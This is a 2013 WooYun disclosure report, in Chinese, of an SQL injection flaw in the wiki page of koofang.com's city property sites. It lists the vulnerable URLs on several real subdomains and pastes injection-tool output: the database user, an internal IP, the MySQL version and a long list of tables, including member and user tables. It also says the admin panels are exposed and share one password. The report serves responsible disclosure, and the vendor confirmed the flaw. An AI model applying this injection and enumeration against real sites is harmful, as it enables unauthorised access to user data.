当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022028

漏洞标题:酷房网某处安全问题通杀全国各地站点,已近后台..

相关厂商:koofang.com

漏洞作者: 带馅儿馒头

提交时间:2013-04-17 17:01

修复时间:2013-06-01 17:01

公开时间:2013-06-01 17:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-17: 细节已通知厂商并且等待厂商处理中
2013-04-22: 厂商已经确认,细节仅向厂商公开
2013-05-02: 细节向核心白帽子及相关领域专家公开
2013-05-12: 细节向普通白帽子公开
2013-05-22: 细节向实习白帽子公开
2013-06-01: 细节向公众公开

简要描述:

酷房网某处安全问题通杀全国各地站点

详细说明:

1.存在的注入点为:http://xxx.koofang.com/wiki/wiki_detail.php?id=xxx,wiki_datail.php函数存在问题,通杀全国酷房站点;
2.测试了以下站点均存在同样的问题,而且管理员的用户名、密码全一样!!!

http://beijing.koofang.com/wiki/wiki_detail.php?id=126
http://shanghai.koofang.com/wiki/wiki_detail.php?id=74
http://chengdu.koofang.com/wiki/wiki_detail.php?id=92


3.跑了下表;

Current DB: fang_utf8_beijing
Current User: fangutf8@192.168.0.21
Sql Version: 5.1.63-log
Current DB: fang_utf8_beijing
System User: fangutf8@192.168.0.21
Host Name: Mysql_15
Installation dir: /usr/local/mysql-5.1.63/
Db user: 'fangutf8'@'192.168.0.%'
Data Base Found: information_schema
Data Base Found: fang_utf8_beijing
Data Base Found: test


Table found: access_up_1000
Table found: answer_log
Table found: answer_one_detail
Table found: answer_two_detail
Table found: bad_price_sell
Table found: borough_info_day
Table found: c21_best
Table found: editor_borough_house
Table found: editor_hotbbs
Table found: editor_index_house
Table found: editor_search_house
Table found: fke_ads
Table found: fke_ads_place
Table found: fke_ads_stat
Table found: fke_all_pv
Table found: fke_auction_item
Table found: fke_bid
Table found: fke_borough
Table found: fke_borough_adviser
Table found: fke_borough_avgprice
Table found: fke_borough_bak
Table found: fke_borough_day
Table found: fke_borough_draw
Table found: fke_borough_draw_bak
Table found: fke_borough_evaluate
Table found: fke_borough_info
Table found: fke_borough_info_bak
Table found: fke_borough_intention
Table found: fke_borough_log
Table found: fke_borough_pic
Table found: fke_borough_pic_bak
Table found: fke_borough_trend
I got bored of waiting more than 60 seconds! (request timed out)
Bypassing illegal union failed! Turning off this feature
Table found: fke_borough_update
Table found: fke_broker_aptitude
Table found: fke_broker_avatar
Table found: fke_broker_avatar_bak
Table found: fke_broker_friends
Table found: fke_broker_identity
Table found: fke_broker_info
Table found: fke_broker_info_bak
Table found: fke_broker_recommend
Table found: fke_broker_star
Table found: fke_broker_storemanager
Table found: fke_broker_transactionreport
Table found: fke_broker_use
Table found: fke_broker_use_bak
Table found: fke_chart_new_house
Table found: fke_community_bid
Table found: fke_community_bid_bak
Table found: fke_community_bid_history
Table found: fke_community_bid_rs
Table found: fke_community_bid_rs_bak
Table found: fke_community_bid_rs_temp
Table found: fke_count_edm
Table found: fke_count_zt
Table found: fke_dd
Table found: fke_dd_item
Table found: fke_dotime
Table found: fke_ent_broker_fee
Table found: fke_ent_company
Table found: fke_ent_fee
Table found: fke_ent_region
Table found: fke_ent_sftokoo_borough
Table found: fke_ent_store
Table found: fke_ent_storemanager
Table found: fke_ent_user
Table found: fke_ent_user_part
Table found: fke_gold_log
Table found: fke_gold_log_bak
Table found: fke_group
Table found: fke_hexun_click
Table found: fke_hot_borough
Table found: fke_hot_borough_tmp
Table found: fke_hotsearch
Table found: fke_house_agent
Table found: fke_house_wanted
Table found: fke_house_wantedreply
Table found: fke_housecommunity_hits
Table found: fke_houserent
Table found: fke_houserent_bak
Table found: fke_houserent_bargain
Table found: fke_houserent_cache
Table found: fke_houserent_delete
Table found: fke_houserent_expired_computer
Table found: fke_houserent_pic
Table found: fke_houserent_refresh_cache
Table found: fke_houserent_stat
Table found: fke_houserent_stat_temp
Table found: fke_houserent_tag
Table found: fke_houserent_top
Table found: fke_housesell
Table found: fke_housesell_bak
Table found: fke_housesell_bargain
Table found: fke_housesell_cache
Table found: fke_housesell_delete
Table found: fke_housesell_expired_computer
Table found: fke_housesell_for_explain
Table found: fke_housesell_pic
Table found: fke_housesell_refresh_cache
Table found: fke_housesell_stat
Table found: fke_housesell_stat_tmp
Table found: fke_housesell_tag
Table found: fke_housesell_top
Table found: fke_housesell_trend
Table found: fke_index_view
Table found: fke_innernote
Table found: fke_integral_log
Table found: fke_integral_log_bak
Table found: fke_integral_rule
Table found: fke_linkclass
Table found: fke_member
Table found: fke_member_bak
Table found: fke_member_likun
Table found: fke_member_loginlog
Table found: fke_message_rule
Table found: fke_money_log
Table found: fke_outlink
Table found: fke_owner_info
Table found: fke_pinggu
Table found: fke_pinggu_dd
Table found: fke_pinggu_dd_item
Table found: fke_pv
Table found: fke_report
Table found: fke_sendSMS
Table found: fke_sendmsg_log
Table found: fke_shop_conf
Table found: fke_shop_viewlog
Table found: fke_special
Table found: fke_statistics
Table found: fke_themes
Table found: fke_themes_detail
Table found: fke_timer_refresh_object_all
Table found: fke_timer_refresh_object_all_test
Table found: fke_timer_refresh_object_daily
Table found: fke_timer_refresh_object_daily_test
Table found: fke_timer_solution
Table found: fke_timer_solution_detail
Table found: fke_user3
Table found: fke_users
Table found: fke_yizhuang_house
Table found: houserent_sphinxse
Table found: housesell_sphinxse
I got bored of waiting more than 60 seconds! (request timed out)
Table found: iplib
Table found: operat_log
Table found: photo_pics
Table found: photo_score_log
Table found: photo_theme
Table found: photo_vote
Table found: record_refresh
Table found: refresh_nums
Table found: report_borough_count_simple_daily
Table found: report_borough_count_simple_monthly
Table found: report_borough_monthly_temporary
Table found: report_borough_temporary
Table found: report_broker_count_simple_daily
Table found: report_broker_monthscore
Table found: report_broker_monthscore_leave
Table found: report_broker_temporary
Table found: sis_department
Table found: sis_department_bak
Table found: sis_header_temp
Table found: sis_levelchange
Table found: sis_shop
Table found: sis_shop_bak
Table found: soufuntokoofang
Table found: sph_office_rent_counter
Table found: sph_office_sell_counter
Table found: sph_rent_counter
Table found: sph_rent_modify_counter
Table found: sph_sell_counter
Table found: sph_sell_modify_counter
Table found: sph_shop_rent_counter
Table found: sph_shop_sell_counter
Table found: test1
Table found: testrent_temp
Table found: testsell_temp
Table found: texts
Table found: tmp_fke_houserent
Table found: tmp_fke_housesell
Table found: wiki_article
Table found: wiki_catalog
Table found: wiki_tag


4.后台很好猜测,都对外开放;

1.png


3.png

漏洞证明:

见详细说明

修复方案:

过滤用户输入,限制后台访问

版权声明:转载请注明来源 带馅儿馒头@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2013-04-22 09:37

厂商回复:

正在紧急修复,感谢~

最新状态:

暂无

漏洞评价:

评论

  1. 2013-04-17 17:09 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:136 | 心在,梦在)

    @xsser 哥,你标题有错别字 @酷房网 求个礼物呀!!!

  2. 2013-04-18 09:21 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:165 | 没有最专业的农民,只有更努力地耕耘..........)

    目测是fangutf8那个

  3. 2013-04-19 10:03 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:136 | 心在,梦在)

    @专业种田 客官,你知道的太多了

  4. 2013-04-23 10:50 | 黑匣子 ( 实习白帽子 | Rank:64 漏洞数:17 | 我是一个有思想的菜鸟!)

    @带馅儿馒头 我的服务器权限才10Rank,另外别求礼物了,我的联系方式被厂商拿走后,就没有然后了(也许距离太远吧)!- -